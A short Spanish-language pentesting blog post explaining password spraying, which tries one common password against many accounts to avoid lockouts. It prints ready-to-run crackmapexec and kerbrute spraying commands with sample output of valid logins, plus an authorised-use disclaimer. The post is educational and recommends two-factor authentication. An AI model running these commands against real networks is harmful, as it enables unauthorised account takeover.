~ / blog / pentesting
KALI

Password spraying

El ataque de fuerza bruta clásico bloquea cuentas rápido.

El password spraying es más astuto: prueba UNA sola contraseña muy común, como el nombre de la empresa más el año, contra MUCHOS usuarios. Así no dispara los bloqueos por intentos fallidos, y casi siempre hay alguien que usa esa clave obvia.

crackmapexec lo hace contra toda la red. Por eso el doble factor es innegociable.

# los comandos

kali@kali:~$ crackmapexec smb 10.0.0.0/24 -u users.txt -p 'Empresa2026!' --continue-on-successcopiar
SMB 10.0.0.20 [+] EMPRESA\mgomez:Empresa2026!
SMB 10.0.0.31 [+] EMPRESA\lruiz:Empresa2026!
kali@kali:~$ kerbrute passwordspray -d empresa.com users.txt 'Empresa2026!'copiar
[+] VALID LOGIN: mgomez@empresa.com:Empresa2026!
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.